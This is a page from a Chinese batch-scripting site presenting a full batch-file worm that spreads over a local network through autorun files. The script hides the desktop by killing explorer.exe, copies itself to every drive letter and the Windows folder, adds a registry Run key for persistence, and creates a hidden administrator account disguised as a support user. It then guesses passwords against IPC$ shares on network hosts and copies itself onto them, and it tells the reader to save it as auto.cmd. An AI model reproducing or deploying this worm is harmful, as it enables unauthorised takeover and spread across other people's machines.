减小字体
增大字体- ·上一篇文章:IIS与SQL服务器安全加固详解
- ·下一篇文章:CMD创建畸形文件夹及漏洞利用
- ·百度中搜索更多的关于“批处理写网内自动传播自动播放病毒”相关内容
- ·谷歌中搜索更多的关于“批处理写网内自动传播自动播放病毒”相关内容
- ******申明******
- 本站文章内容有部分为收录网络中其他网友内容,DOS资源站不保证所有的代码都适合你使用。
- 由于编辑匆忙,有可能造成某些脚本文件出现丢失代码或代码无法运行的情况,请网友根据情况自行修改。
- 如果能将出错部分反馈给我,那就更好了。
批处理写网内自动传播自动播放病毒
@echo off&title DOS资源站 www.cmdos.net
::我不知道你们怎么对病毒感染如此感冒。
::我们是来救人的,不是来害人的。希望不要乱用乱学。
setlocal ENABLEDELAYEDEXPANSION
::关闭EXPLORER。EXE进程,让用户无法看见运行的BAT
::并且利用START最小化BAT
TASKKILL /F /IM EXPLORER.EXE>nul
:newautorun
::建立autorun.inf文件
echo [autorun]>autorun.inf
echo open=%windir%\auto.cmd>>autorun.inf
echo shellexecute=%windir%\auto.cmd>>autorun.inf
echo shell\auto\command=%windir%\auto.cmd>>autorun.inf
echo start for
for %%i in (C D E F G H I J K L M) DO (
COPY /y autorun.inf %%i:\>nul
)
:start
copy /y %0 %windir%\>nul
::启动时启动病毒文件
::其实这里我们还可以把启动名改为ctfmon或IMSCMig输入法的名称,这样
SET REG1="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run"
REG ADD %REG1% /v Script /t REG_SZ /d %windir%\auto.cmd>nul
::建立新的用户
::伪装成一个帮助提供商的用户名SUPPORT_388945_0;
::有的系统不能让用户名为空,或不能密码太简单e
set user1=SUPPORT_388945_0
set pass=admin3389
net user %user1% %pass% /add
net localgroup Administrators %user1% /add
::检查所有活动的机子
rem ###########################
rem 建立密码文件
echo admin3389>hack.txt
echo 123456>>hack.txt
echo admin>>hack.txt
echo 00>>hack.txt
rem ###########################
net view>host.txt
for /f %%a in (host.txt) do (
for /f %%b in (hack.txt) do net use %%a\ipc$ "%%b" /user:administrator
copy /y %windir%\auto.cmd %%a\admin$
copy /y %windir%\autorun.inf %%a\c$
)
::呵呵,写得无聊了,不想写下去了
::最后再把EXPLORER.EXE进程启动,让用户恢复操作,呵呵
%windir%\explorer.exe
:END注意,要把批处理保存为auto.cmd
